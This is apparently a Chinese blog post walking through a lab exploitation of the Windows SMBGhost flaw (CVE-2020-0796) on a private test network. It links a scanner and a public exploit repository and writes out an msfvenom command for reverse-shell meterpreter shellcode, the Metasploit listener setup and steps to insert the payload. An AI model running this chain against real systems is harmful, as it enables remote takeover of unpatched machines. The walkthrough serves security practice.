攻击机ip:192.168.20.133
目标ip:192.168.20.138
靶机thunder://QUFodHRwOi8veHoxLmRhb2hhbmc0LmNvbS9jbl93aW5kb3dzXzEwX2NvbnN1bWVyX2VkaXRpb25zX3ZlcnNpb25fMTkwM194NjRfZHZkXzhmMDUyNDFkLmlzb1pa
poc
http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip
下图中说明192.168.20.138存在漏洞
exp需要python版本3.6
https://github.com/chompie1337/SMBGhost_RCE_PoC
生成shellcode:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.20.133 lport=4444 -f py
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-HzlOykNI-1648796003051)(https://raw.githubusercontent.com/VVeakee/img_bed/main/202204011421315.png)]](https://i-blog.csdnimg.cn/blog_migrate/b97a133679b676ef41f020f38dc5a715.png)
把生成的shellcode粘贴出来
把buf全部替换为USER_PAYLOAD
把替换好的shellcode再去exp利用脚本里替换
msf设置监听
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.20.133
set lport 4444
run
开始实施攻击(确定你的python版本是3.6)
如果出现下图
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-4QZRmPRI-1648796003054)(https://raw.githubusercontent.com/VVeakee/img_bed/main/202204011438816.png)]](https://i-blog.csdnimg.cn/blog_migrate/f79b0afcd4e5483ec177b69abf419a74.png)
就先ping一下是不是能ping通
果然ping不通
然后去把windows的防火墙关了就能ping通了
再试一下出现了这个,再试一下
然后就成功了这个,再试一下
![[外链图片转存中...(img-lBh2nD6m-1648796003056)]](https://i-blog.csdnimg.cn/blog_migrate/63f569f3b8c15f99f291367ca08a2255.png)
然后就成功了
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
